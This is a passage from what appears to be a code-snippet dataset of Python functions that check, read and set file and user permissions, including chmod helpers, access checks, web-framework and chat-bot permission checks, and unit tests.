fname, permissions )\n else:\n # assume 'permissions' is a tuple or list\n remote.x_apply_chmod( fname, *permissions )", "def permissions_check(\n basedir='.',\n verbose_level=0,\n):\n # File permissions on Cygwin/Windows filesystems don't work the\n # same way as Linux. Don't try to change them.\n # TODO(dittrich): Is there a Better way to handle perms on Windows?\n fs_type = get_fs_type(basedir)\n if fs_type in ['NTFS', 'FAT', 'FAT32']:\n msg = (\n f\"[-] {basedir} has file system type '{fs_type}': \"\n \"skipping permissions check\"\n )\n logger.info(msg)\n return\n any_other_perms = stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH\n for root, dirs, files in os.walk(basedir, topdown=True):\n for name in files:\n path = os.path.join(root, name)\n try:\n st = os.stat(path)\n perms = st.st_mode & 0o777\n open_perms = (perms & any_other_perms) != 0\n if (open_perms and verbose_level >= 1):\n print(\n f\"[!] file '{path}' is mode {oct(perms)}\",\n file=sys.stderr\n )\n except OSError:\n pass\n for name in dirs:\n path = os.path.join(root, name)\n try:\n st = os.stat(path)\n perms = st.st_mode & 0o777\n open_perms = (perms & any_other_perms) != 0\n if (open_perms and verbose_level >= 1):\n print(\n (\n f\"[!] directory '{path}' is mode \"\n f\"{oct(perms)}\"\n ),\n file=sys.stderr\n )\n except OSError:\n pass", "def can(self, permissions: Union[str, List]) -> bool:", "def _have_permissions(self, location):\n if not os.path.isfile(location):\n return True\n \n stats = os.stat(location)\n # check specifically for write permission\n return bool(stats.st_mode & stat.S_IWUSR)", "def check_perms(resource):\r\n stmode = os.stat(resource).st_mode\r\n return (getattr(stat, 'S_IROTH') & stmode) > 0", "def check_perms(resource):\r\n stmode = os.stat(resource).st_mode\r\n return (getattr(stat, 'S_IROTH') & stmode) > 0", "def check_permission(perm_mode, flags=stat.S_IWOTH):\n return bool(perm_mode & flags)", "def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):\n for permission_class in self.permission_classes:\n permission = permission_class()\n\n if not permission.has_permission(source, info, **kwargs):\n message = getattr(permission, \"message\", None)\n raise PermissionError(message)", "def _checkPermission(self, module):\r\n permission = []\r\n\r\n for p in sys.path:\r\n path = os.path.join(p, module[0])\r\n\r\n if os.path.isdir(path):\r\n if not os.access(path, os.R_OK | os.X_OK):\r\n permission.append(True)\r\n elif (len(module) > 1 and\r\n any(os.access(os.path.join(path, init), os.F_OK)\r\n for init in ['__init__.py', '__init__.pyc'])):\r\n permission.append(self._checkPermission(module[1:]))\r\n\r\n return bool(permission and all(permission))", "def permissions():\n pass", "def are_readable_files(self, fnames):\n for fname in fnames:\n if not os.access(fname, os.R_OK):\n self.cli_parser.error(\"%s doesn't exist or you do \"\n \"not have read permissions to it.\" % fname)", "def has_permission(self, file):\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@link android.Manifest.permission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@link Manifest.permission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission.Read(@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission.Write(@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\".permission\"):\n return True\n\n return False", "def cant(self, permissions: Union[str, List]) -> bool:", "def test_specifiedPermissions(self):\n log1 = logfile.LogFile(self.name, self.dir, defaultMode=0066)\n mode = stat.S_IMODE(os.stat(self.path)[stat.ST_MODE])\n if runtime.platform.isWindows():\n # The only thing we can get here is global read-only\n self.assertEquals(mode, 0444)\n else:\n self.assertEquals(mode, 0066)", "def can_any(self, permissions: Union[str, List]) -> bool:", "def check_permissions(permission, payload):\n if 'permissions' not in payload:\n abort(401)\n\n if permission not in payload['permissions']:\n abort(401)\n\n return True", "def PermissionsFileProcessor(input_file):\n access_value_msg = GetApiMessage('Dataset').AccessValueListEntry\n try:\n permissions_array = []\n permissions_from_file = yaml.load(input_file[0])\n permissions_from_file = permissions_from_file.get('access', None)\n if not permissions_from_file or not isinstance(permissions_from_file, list):\n raise PermissionsFileError(\n 'Error parsing permissions file: no access list defined in file')\n for access_yaml in permissions_from_file:\n permission = encoding.PyValueToMessage(access_value_msg, access_yaml)\n if _ValidatePermission(permission):\n permissions_array.append(permission)\n else:\n raise PermissionsFileError(('Error parsing permissions file:'\n ' invalid permission definition'\n ' [{}]'.format(permission)))\n\n return sorted(permissions_array, key=lambda x: x.role)\n except yaml.YAMLParseError as ype:\n raise PermissionsFileError('Error parsing permissions file [{}]'.format(\n ype))", "def get_permissions(self, filepath):\n return oct(os.stat(filepath).st_mode & 0777)", "def test_permissions(self):\n exist = os.access('models/amenity.py', os.F_OK)\n self.assertTrue(exist)\n read = os.access('models/amenity.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/amenity.py', os.W_OK)\n self.assertTrue(write)\n exe = os.access('models/amenity.py', os.X_OK)\n self.assertTrue(exe)", "def check_permissions(self, request):\n for permission in self.get_permissions():\n if not permission.has_permission(request, self):\n self.permission_denied(\n request,\n message=getattr(permission, 'message', None),\n code=getattr(permission, 'code', None)\n )", "def test_specifiedPermissions(self):\n log1 = logfile.LogFile(self.name, self.dir, defaultMode=0o066)\n self.addCleanup(log1.close)\n mode = stat.S_IMODE(os.stat(self.path)[stat.ST_MODE])\n if runtime.platform.isWindows():\n # The only thing we can get here is global read-only\n self.assertEqual(mode, 0o444)\n else:\n self.assertEqual(mode, 0o066)", "def set_permissions(self, permissions):\n\n\t\tif Platform.PLATFORM_POSIX == self.__platform.get_platform():\n\t\t\tif permissions.__class__ == str and re.match('([-r][-w][-xsStT]){3,3}', permissions):\n\t\t\t\tself.__permissions = 0\n\t\t\t\tif permissions[0] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IRUSR\n\t\t\t\tif permissions[1] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWUSR\n\t\t\t\tif permissions[2] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXUSR\n\t\t\t\tif permissions[3] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IRGRP\n\t\t\t\tif permissions[4] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWGRP\n\t\t\t\tif permissions[5] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXGRP\n\t\t\t\tif permissions[6] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IROTH\n\t\t\t\tif permissions[7] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWOTH\n\t\t\t\tif permissions[8] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXOTH\n\t\t\t\t\t\n\t\t\telif permissions.__class__ == str and re.match('(0)?[0-7]{3,3}', permissions):\n\t\t\t\tif len(permissions) == 3:\n\t\t\t\t\tpermissions = '0' + permissions\n\t\t\t\tself.__permissions = octstr_to_int(permissions)\n\t\t\t\n\t\t\telif permissions.__class__ == int and 0 <= permissions <= 511:\n\t\t\t\tself.__permissions = permissions\n\t\t\t\n\t\t\telse:\n\t\t\t\traise PermissionsInvalidError()\n\n\t\telif Platform.PLATFORM_WINDOWS == self.__platform.get_platform():\n\t\t\tif permissions.__class__ == str and re.match('[-r][-w]', permissions):\n\t\t\t\tself.__permissions = 0\n\t\t\t\tif permissions[0] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IREAD\n\t\t\t\tif permissions[1] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWRITE\n\t\t\telif permissions.__class__ == int and 0 <= permissions <= 511:\n\t\t\t\tself.__permissions = permissions\n\t\t\telse:\n\t\t\t\traise PermissionsInvalidError() \n\t\telse:\n\t\t\traise PlatformNotSupportedError()", "def test_check_perm(self):\n #Test something that really shouldn't be there\n with pytest.raises(DbException) as err:\n ModulePerm.get_module_perm_by_id(0)\n assert str(err.value) == \"(404, 'Permission not found.')\"\n\n perm = ModulePerm.get_module_perm_by_id(self.permList[0].id)\n assert perm.id == self.permList[0].id\n assert perm.user_id == self.permList[0].user_id\n assert perm.module_id == self.permList[0].module_id\n assert perm.permissions == self.permList[0].permissions\n assert perm.permissions == 15\n\n assert perm.check_perm_read_raw()\n assert perm.check_perm_write_raw()\n assert perm.check_perm_share_raw()\n assert perm.check_perm_own_raw()\n\n perm = ModulePerm.get_module_perm_by_id(self.permList[2].id)\n assert perm.id == self.permList[2].id\n assert perm.user_id == self.permList[2].user_id\n assert perm.module_id == self.permList[2].module_id\n assert perm.permissions == self.permList[2].permissions\n assert perm.permissions == 0\n\n assert not perm.check_perm_read_raw()\n assert not perm.check_perm_write_raw()\n assert not perm.check_perm_share_raw()\n assert not perm.check_perm_own_raw()", "def set_file_permissions(host, fqpath, perms):\n command = \"chmod %s %s\" % (perms, fqpath)\n rcode, _, rerr = g.run(host, command)\n\n if rcode == 0:\n return True\n\n g.log.error('chmod failed: %s' % rerr)\n return False", "def sort_permissions(fl):\n\n if oct(os.stat(fl).st_mode)[4:] != '666':\n os.chmod(fl, 0o666)", "def check_writable ( self,\n fspath, mkdir_chown=False, mkdir_chmod=False, mkdir_p=True\n ):\n success = False\n\n ERRNOS_IGNORE = { errno.EACCES, }\n\n try:\n if self.do_touch ( fspath ):\n success = True\n\n except IOError as ioerr:\n if ioerr.errno == errno.EPERM:\n pass\n elif ioerr.errno == errno.ENOENT:\n try:\n if self.dodir (\n os.path.dirname ( fspath ),\n chown=mkdir_chown, chmod=mkdir_chmod, mkdir_p=mkdir_p\n ) and self.do_touch ( fspath ):\n success = True\n\n except ( OSError, IOError ) as err:\n if err.errno == errno.EPERM:\n pass\n elif err.errno in ERRNOS_IGNORE:\n self.error (\n 'Got {name} with unexpected '\n 'errno={code:d} ({code_name})\\n'.format (\n name = err.__class__.__name__,\n code = err.errno,\n code_name = errno.errorcode [err.errno],\n )\n )\n else:\n raise\n # -- end <try again>\n elif ioerr.errno in ERRNOS_IGNORE:\n self.error (\n 'Got {name} with unexpected '\n 'errno={code:d} ({code_name})\\n'.format (\n name = ioerr.__class__.__name__,\n code = ioerr.errno,\n code_name = errno.errorcode [ioerr.errno],\n )\n )\n else:\n raise\n return success", "def test_provider_system_hook_file_chmod(change_dir, fix_file_perms):\n tackle(context_file='chmod.yaml', no_input=True)\n assert oct(os.stat('tackle.yaml').st_mode)[-3:] == \"600\"", "def check_file_validity(self, file_):\n if not os.access(file_, os.F_OK):\n raise TailError(\"File '%s' does not exist\" % (file_))\n if not os.access(file_, os.R_OK):\n raise TailError(\"File '%s' not readable\" % (file_))\n if os.path.isdir(file_):\n raise TailError(\"File '%s' is a directory\" % (file_))", "def can_manage(self, filename):\n return False", "async def permission_valid_check(cls):\n pass", "def check_arguments(self):\n self.check_num_arguments()\n self.are_readable_files(self.args)", "def check_authorization(\n self,\n perms: Sequence[tuple[str, str]] | None = None,\n dag_id: str | None = None,\n ) -> bool:\n if not perms:\n return True\n\n for perm in perms:\n if perm in (\n (permissions.ACTION_CAN_READ, permissions.RESOURCE_DAG),\n (permissions.ACTION_CAN_EDIT, permissions.RESOURCE_DAG),\n (permissions.ACTION_CAN_DELETE, permissions.RESOURCE_DAG),\n ):\n can_access_all_dags = self.has_access(*perm)\n if can_access_all_dags:\n continue\n\n action = perm[0]\n if self.can_access_some_dags(action, dag_id):\n continue\n return False\n\n elif not self.has_access(*perm):\n return False\n\n return True", "def RequestedPermissions(self) -> _n_6_t_0:", "def edit_file_permission(request, app=None, priv=None):\n pass", "def test_custom_permissions(self, course_dir):\n run_nbgrader([\"db\", \"assignment\", \"add\", \"ps1\"])\n run_nbgrader([\"db\", \"student\", \"add\", \"foo\"])\n self._empty_notebook(join(course_dir, \"source\", \"ps1\", \"foo.ipynb\"))\n run_nbgrader([\"generate_assignment\", \"ps1\"])\n\n self._empty_notebook(join(course_dir, \"submitted\", \"foo\", \"ps1\", \"foo.ipynb\"))\n run_nbgrader([\"autograde\", \"ps1\"])\n run_nbgrader([\"generate_feedback\", \"ps1\", \"--GenerateFeedback.permissions=444\"])\n\n assert isfile(join(course_dir, \"feedback\", \"foo\", \"ps1\", \"foo.html\"))\n assert self._get_permissions(join(course_dir, \"feedback\", \"foo\", \"ps1\", \"foo.html\")) == '444'", "def check_write_permission():\n if platform != \"android\":\n return True\n from android.permissions import Permission, check_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n return check_permission(permission)", "def check_write_permission():\n if platform != \"android\":\n return True\n from android.permissions import Permission, check_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n return check_permission(permission)", "def test_get_permissions(self):\n pass", "def perms_check(self, ctx):\r\n\t\tcommand = ctx.invoked_with\r\n\t\ttry:\r\n\t\t\tif config.cfg[\"main\"][\"perms\"][command] in [x.id for x in ctx.author.roles]:\r\n\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\texcept KeyError:\r\n\t\t\tif config.cfg[\"main\"][\"perms\"][\"global\"] in [x.id for x in ctx.author.roles]:\r\n\t\t\t\treturn True\r\n\t\t\treturn False", "def test_check():\n for f in cfg.required_files:\n assert os.path.isfile(f)", "def CheckPerm(self, mr, perm, art=None, granted_perms=None):\n return servlet_helpers.CheckPerm(\n mr, perm, art=art, granted_perms=granted_perms)", "async def perms(perms, g, c, m):\n for perm in perms:\n if not dict(g.me.guild_permissions).get(perm):\n await c.send(f'I must have the `{perm.upper()}` permission to do this.')\n raise Exception()\n if not dict(m.guild_permissions).get(perm):\n await c.send(f'You must have the `{perm.upper()}` permission to do this.')\n raise Exception()\n return True", "def check_permission():\n if IS_ADMIN:\n out_info(\"Running as Root/Admin\")\n else:\n out_warning(\"Running without root/admin privileges\")", "def check_requirements(self):\n if not os.path.isfile(self.file_path):\n _logger.error(\"File not found\")\n _logger.error(ex)\n raise\n _logger.info(\"File notifier check passed\")", "def check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Token must include permissions'\n }, 401)\n elif permission not in payload['permissions']:\n raise AuthError({\n 'code': 'permission_missing',\n 'description': 'Permission not found.'\n }, 403)\n else:\n return True", "def permission_required_or_403(perm, *args, **kwargs):\n kwargs['return_403'] = True\n return permission_required(perm, *args, **kwargs)", "def isfile_strict(path):\r\n try:\r\n st = os.stat(path)\r\n except OSError:\r\n err = sys.exc_info()[1]\r\n if err.errno in (errno.EPERM, errno.EACCES):\r\n raise\r\n return False\r\n else:\r\n return stat.S_ISREG(st.st_mode)", "def get_permissions(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetPermissions', self.handle)", "def check_request_write_permission(callback=None):\n had_permission = check_write_permission()\n if not had_permission:\n from android.permissions import Permission, request_permissions\n permissions = [Permission.WRITE_EXTERNAL_STORAGE]\n request_permissions(permissions, callback)\n return had_permission", "def any_permission_required(*args):\n def test_func(user):\n for perm in args:\n if user.has_perm(perm):\n return True\n return False\n return user_passes_test(test_func)", "def get_permissions(filepath):\n return oct(stat.S_IMODE(os.lstat(filepath).st_mode))", "def is_permission_err(exc):\n assert isinstance(exc, OSError), exc\n # On Python 2 OSError doesn't always have 'winerror'. Sometimes\n # it does, in which case the original exception was WindowsError\n # (which is a subclass of OSError).\n return exc.errno in (errno.EPERM, errno.EACCES) or \\\n getattr(exc, \"winerror\", -1) in (cext.ERROR_ACCESS_DENIED,\n cext.ERROR_PRIVILEGE_NOT_HELD)", "def _check_conditions_permissions(user, permissions, course_id, **kwargs):\r\n\r\n def test(user, per, operator=\"or\"):\r\n if isinstance(per, basestring):\r\n if per in CONDITIONS:\r\n return _check_condition(user, per, course_id, kwargs)\r\n return cached_has_permission(user, per, course_id=course_id)\r\n elif isinstance(per, list) and operator in [\"and\", \"or\"]:\r\n results = [test(user, x, operator=\"and\") for x in per]\r\n if operator == \"or\":\r\n return True in results\r\n elif operator == \"and\":\r\n return not False in results\r\n return test(user, permissions, operator=\"or\")", "def testChAttrs(self):\n def _check(results):\n self.flushLoggedErrors()\n self.assertTrue(results[0].startswith(b'-rw-r--r--'))\n self.assertEqual(results[1], b'')\n self.assertTrue(results[2].startswith(b'----------'), results[2])\n self.assertEqual(results[3], b'')\n\n d = self.runScript('ls -l testfile1', 'chmod 0 testfile1',\n 'ls -l testfile1', 'chmod 644 testfile1')\n return d.addCallback(_check)\n # XXX test chgrp/own", "async def check_permissions(self, ctx, channel: typing.Optional[typing.Union[discord.TextChannel, discord.VoiceChannel]] = None, *, target: typing.Union[discord.Member, discord.Role] = None):\n if target == None:\n target = ctx.author\n if isinstance(target, discord.Member):\n if channel == None:\n perms = target.guild_permissions\n else:\n perms = channel.permissions_for(target)\n col = target.color\n avatar = await self.bot.user_avatar_as(target, size=256)\n name = str(target)\n elif isinstance(target, discord.Role):\n perms = target.permissions\n if channel != None:\n perms.update(\n **{x[0]: x[1] for x in channel.overwrites_for(ctx.guild.default_role) if x[1] != None})\n perms.update(**{x[0]: x[1] for x in channel.overwrites_for(target) if x[1] != None})\n col = target.color\n avatar = ctx.guild.icon_url_as(format='png', size=256)\n name = str(target)\n permsl = list()\n # Get the perms translations\n\n # if perms[\"\"]\n if perms.administrator:\n # If the user is admin, we just say it\n if \"administrator\" in perms_translations.keys():\n perm = perms_translations[\"administrator\"]\n else:\n perm = \"Administrator\"\n permsl.append(\":white_check_mark:\" + perm)\n else:\n # Here we check if the value of each permission is True.\n for perm, value in perms:\n if (perm not in self.perms_name['text']+self.perms_name['common_channel'] and isinstance(channel, discord.TextChannel)) or (perm not in self.perms_name['voice']+self.perms_name['common_channel'] and isinstance(channel, discord.VoiceChannel)):\n continue\n #perm = perm.replace('_',' ').title()\n if perm in perms_translations.keys():\n perm = perms_translations[perm]\n else:\n perm = perm.replace('_', ' ').title()\n if value:\n permsl.append(\":white_check_mark:\" + perm)\n else:\n permsl.append(\":x:\" + perm)\n if ctx.channel.permissions_for(ctx.guild.me).embed_links:\n # \\uFEFF is a Zero-Width Space, which basically allows us to have an empty field name.\n # And to make it look nice, we wrap it in an Embed.\n desc = \"Permissions générales\" if channel is None else channel.mention\n embed = discord.Embed(color=col, description=desc)\n embed.set_author(name=name, icon_url=avatar)\n if len(permsl) > 10:\n sep = int(len(permsl)/2)\n if len(permsl) % 2 == 1:\n sep += 1\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl[:sep]))\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl[sep:]))\n else:\n embed.add_field(name='\\uFEFF', value=\"\\n\".join(permsl))\n await ctx.send(embed=embed)\n # Thanks to Gio for the Command.\n else:\n try:\n await ctx.send(\"**Permission de '{}' :**\\n\\n\".format(name.replace('@', '')) + \"\\n\".join(permsl))\n except:\n pass", "def is_insufficient_permissions(self):\n return self._tag == 'insufficient_permissions'", "def check_request_write_permission():\n had_permission = check_write_permission()\n if not had_permission:\n from android.permissions import Permission, request_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n request_permission(permission)\n return had_permission", "def check_package_list_file(package_list_path, *args, **kwargs):\n logger.debug(\"Checking file status\")\n path_exists = path.exists(package_list_path)\n path_is_dir = path.isdir(package_list_path)\n\n logger.debug(\"File status found, returning value\")\n if not path_exists:\n return 1\n elif path_exists and path_is_dir:\n return 2\n else:\n return 3", "def has_repo_file_privilege(login, repo_base, repo, privilege):\n repo = repo.lower()\n repo_base = repo_base.lower()\n\n # Users always have privileges over their own files.\n if login == repo_base:\n return\n\n # Check if the current user or the public user has the privilege on\n # this repo.\n # The anonymous user is never explicitly shared with, so we don't need\n # to check for that.\n permitted_collaborators = Collaborator.objects.filter(\n repo_base=repo_base,\n repo_name=repo,\n file_permission__contains=privilege,\n user__username__in=[settings.PUBLIC_ROLE, login])\n if not next((c for c in permitted_collaborators), None):\n raise PermissionDenied()", "def _check_permission_recursive(self, coll_path, perm_subject, permission):\n if permission == \"null\":\n raise ValueError(\"permission cannot be null, use other functions instead\")\n query = self.session.query(User.id).filter(User.name == perm_subject)\n perm_subj_id = query.first()[User.id]\n\n # find all related collections (including self)\n coll_obj_query = self.session.query(CollectionAccess.access_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n coll_count = len(coll_obj_query.execute())\n\n # find all related collection that has correct permission\n coll_obj_query = self.session.query(CollectionAccess.access_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n coll_obj_query = coll_obj_query.filter(\n CollectionAccess.name == self.perm_str_reverse_map[permission])\n coll_obj_query = coll_obj_query.filter(\n CollectionAccess.user_id == perm_subj_id)\n correct_colls_count = len(\n [row[CollectionAccess.access_id] for row in coll_obj_query]\n )\n if correct_colls_count != coll_count:\n return False\n\n # check permission for members of all related collections\n data_obj_query = self.session.query(DataAccess.data_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n data_obj_count = len(data_obj_query.execute())\n\n data_obj_query = self.session.query(DataAccess.data_id).filter(\n Criterion('like', Collection.name, '{}%'.format(coll_path)))\n data_obj_query = data_obj_query.filter(\n DataAccess.user_id == perm_subj_id)\n data_obj_query = data_obj_query.filter(\n DataAccess.name == self.perm_str_reverse_map[permission])\n correct_data_obj_count = len(data_obj_query.execute())\n\n if data_obj_count != correct_data_obj_count:\n return False\n\n return True", "def check_dir_perms(path, dir_perm=stat.S_IWOTH, file_perm=stat.S_IWOTH, users=('root',), groups=('root',), recurse=True):\n directories = ((path, (), ()),) if not recurse else os.walk(path)\n for dir_name, sub_dirs, files in directories:\n attrib = os.stat(dir_name)\n if attrib.st_uid not in [pwd.getpwnam(user).pw_uid for user in users]:\n err_msg = 'Directory: \"{0}\" is owned by {1} which is not in the list of allowed users: \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, pwd.getpwuid(attrib.st_uid).pw_name, users))\n\n if attrib.st_gid not in [grp.getgrnam(group).gr_gid for group in groups]:\n err_msg = 'The group for directory: \"{0}\" is {1} which is not in the list of allowed groups: \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, grp.getgrgid(attrib.st_gid).gr_name, groups))\n\n if check_permission(attrib.st_mode, dir_perm):\n # Could add strmode for python one day and make nice human errors\n err_msg = 'The permissions on directory: \"{0}\" are \"{1!s}\" and violate restriction \"{2!s}\"'\n raise PermError(err_msg.format(dir_name, oct(attrib.st_mode), oct(dir_perm)))\n\n for f in files:\n file_attrib = os.stat(os.path.join(dir_name, f))\n if check_permission(file_attrib.st_mode, file_perm):\n # Could add strmode for python one day and make nice human errors\n err_msg = 'The permissions on file: \"{0}\" are \"{1!s}\" and violate restriction \"{2!s}\"'\n raise PermError(err_msg.format(os.path.join(dir_name, f), oct(file_attrib.st_mode), oct(file_perm)))", "def _check_permissions(server, priv):\n # Check user permissions\n user_pass_host = server.user\n if server.passwd is not None and len(server.passwd) > 0:\n user_pass_host += \":\" + server.passwd\n user_pass_host += \"@\" + server.host\n user = User(server, user_pass_host, False)\n if not user.has_privilege(\"*\", \"*\", priv):\n raise UtilError(\"Not enough permissions. The user must have the \"\n \"%s privilege.\" % priv)", "def file_mode_checks(value):\n if not value.endswith(F_SUFFIX):\n raise argparse.ArgumentTypeError(\n \"\\nFile resource must be:\\n\"\n + \" 1) Obfuscated {hex}.cache.js GWT permutation file\"\n )\n return value", "def verify_blob_permissions(self, blob):\n path = self.csum_to_path(blob)\n return is_readonly(path)", "def hasCustomPermissions( self, context, permission ):\n return CustomCheckPermission( context, permission )", "def test_file(path, mode, exception=RuntimeError, isdir=False):\n what = (\"directory\" if isdir else \"file\")\n if not os.access(path, os.F_OK):\n raise exception(\"Cannot access %s '%s'.\" % (what, path))\n if isdir and not os.path.isdir(path):\n raise exception(\n \"Expected '%s' to be a directory, but it's not.\" % path)\n if (mode & os.R_OK) and not os.access(path, os.R_OK):\n raise exception(\"Cannot read %s '%s'.\" % (what, path))\n if (mode & os.W_OK) and not os.access(path, os.W_OK):\n raise exception(\"Cannot write to %s '%s'.\" % (what, path))\n if (mode & os.X_OK) and not os.access(path, os.X_OK):\n if isdir:\n raise exception(\"Cannot traverse directory '%s':\"\n \" lacks 'x' permission.\" % path)\n else:\n raise exception(\"File '%s' lacks execute ('x') permission.\" % path)\n return True", "def check_reminders_permissions(handler_input):\n # type: (HandlerInput) -> Bool\n #check permissions for the Reminder\n permissions = [\"alexa::alerts:reminders:skill:readwrite\"]\n req_envelope = handler_input.request_envelope\n response_builder = handler_input.response_builder\n # Check if user gave permissions to create reminders.\n # If not, request to provide permissions to the skill.\n if not (req_envelope.context.system.user.permissions and\n req_envelope.context.system.user.permissions.consent_token):\n response_builder.speak(NOTIFY_MISSING_PERMISSIONS)\n response_builder.set_card(\n AskForPermissionsConsentCard(permissions=permissions))\n return False\n logger.info(\"Permissions are OK\")\n return True", "def test_extract_permission_docstring(self):\n for permission, expected_dict in [\n (\n PermissionA & PermissionB,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n PermissionA | PermissionB,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n ~PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n },\n ),\n (\n PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n },\n ),\n (\n (PermissionA & PermissionB) | ~PermissionA,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n },\n ),\n (\n (PermissionA & PermissionB) | ~PermissionC,\n {\n \"PermissionA\": \"Permission A.\",\n \"PermissionB\": \"Permission B.\",\n \"PermissionC\": \"Permission C.\",\n },\n ),\n ]:\n with self.subTest(permission=permission):\n self.assertEqual(\n # mimic `get_permissions` by calling permission\n extract_permission_docstring(permission()),\n expected_dict,\n )", "def check(self, mode, values=None):\n res_ids = {}\n if self._ids:\n self._cr.execute(\n \"\"\"SELECT DISTINCT res_type, res_id FROM\n workflow_task WHERE id = ANY (%s)\"\"\", (list(self._ids),))\n for rmod, rid in self._cr.fetchall():\n res_ids.setdefault(rmod, set()).add(rid)\n if values:\n if values.get('res_type') and values.get('res_id'):\n res_ids.setdefault(values['res_type'], set())\\\n .add(values['res_id'])\n\n for model, mids in res_ids.items():\n existing_ids = self.pool[model].exists(self._cr, self._uid, mids)\n self.check_base_security(model, existing_ids, mode)\n if not self._uid == SUPERUSER_ID and\\\n not self.env['res.users'].has_group('base.group_user'):\n raise exceptions.AccessError(\n _(\"Sorry, you are not allowed to access this document.\"))", "def check_file_flag(file):\n return process_file_flag(file, None)", "def can(self, unused_perm):\n return False", "def get_file_perms(self,\n\t filename,\n\t shutit_pexpect_child=None,\n\t note=None,\n\t loglevel=logging.DEBUG):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tshutit_pexpect_child = shutit_pexpect_child or self.get_current_shutit_pexpect_session().pexpect_child\n\t\tshutit_pexpect_session = self.get_shutit_pexpect_session_from_child(shutit_pexpect_child)\n\t\treturn shutit_pexpect_session.get_file_perms(filename,note=note,loglevel=loglevel)", "def file_mode_checker(\n filename: str,\n mode: int = 0o600,\n quiet: bool = False,\n create: bool = False\n):\n try:\n st_mode = os.stat(filename).st_mode\n except OSError: # file does not exist\n if not create:\n raise\n os.close(os.open(filename, os.O_CREAT | os.O_EXCL, mode))\n return\n\n warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'\n if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):\n os.chmod(filename, mode)\n # re-read and check changes\n if os.stat(filename).st_mode != st_mode and not quiet:\n warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))", "def test_check_permissions(mock_list_permissions, mock_dry_permissions):\n view = views.ListEntryListView()\n\n view.check_permissions(None)\n\n assert mock_dry_permissions.call_count == 1\n assert mock_list_permissions.call_count == 1", "def puede_hacer(self, f_name):\n\n for perm in self.permissions:\n if (f_name) == perm.name:\n return True\n return False", "def _is_user_defined_permission(self, perm: Model) -> bool:\n\n return perm.permission.name in self.OBJECT_SPEC_PERMISSIONS", "def _check_r_res(res, o_exp, g_exp, p_exp):\n print green(\"Checking %s owner, group, permissions. \"\n \"Expected: %s, %s, %s\" % (res, o_exp, g_exp, p_exp))\n if exists(res):\n resp = run('stat -c %%U,%%G,%%a %s' % res)\n o_act, g_act, p_act = map(str.strip, resp.split(','))\n if o_act != o_exp or g_act != g_exp or p_act != p_exp:\n abort(red(\"Resource %s params: %s. Expected: %s\" % (\n res, (o_act, g_act, p_act), (o_exp, g_exp, p_exp))))\n print green(\"Resource %s checking passed\" % res)\n else:\n abort(red(\"Resource %s is not exists\" % res))", "def chmod_stat ( self, fspath, mode ):\n if stat.S_ISDIR ( mode ):\n return self.chmod_dir ( fspath )\n else:\n return self.chmod_file ( fspath )", "def test_permissions(self):\n \n from pages.permissions import PagePermission\n admin = User.objects.get(username='admin')\n page = self.new_page()\n pp = PagePermission(user=page.author)\n self.assertTrue(pp.check('change', page=page, method='GET'))\n self.assertTrue(pp.check('change', page=page, method='POST'))\n \n staff = User.objects.get(username='staff')\n pp = PagePermission(user=staff)\n # weird because nonstaff?\n self.assertTrue(pp.check('change', page=page, method='GET',\n lang='en-us'))\n self.assertFalse(pp.check('change', page=page, method='POST',\n lang='en-us'))\n\n self.assertFalse(pp.check('delete', page=page, method='POST',\n lang='en-us'))\n self.assertFalse(pp.check('add', page=page, method='POST',\n lang='en-us'))\n self.assertFalse(pp.check('freeze', page=page, method='POST',\n lang='en-us'))\n\n self.assertFalse(pp.check('doesnotexist', page=page, method='POST',\n lang='en-us'))", "def HasPerms(self, object, perms, verbose = 1) :\n\t\tif type(perms) != type([]) :\n\t\t\tperms = [perms]\n\t\tSecurityManager = AccessControl.getSecurityManager()\n\t\tfor perm in perms :\n\t\t\tif 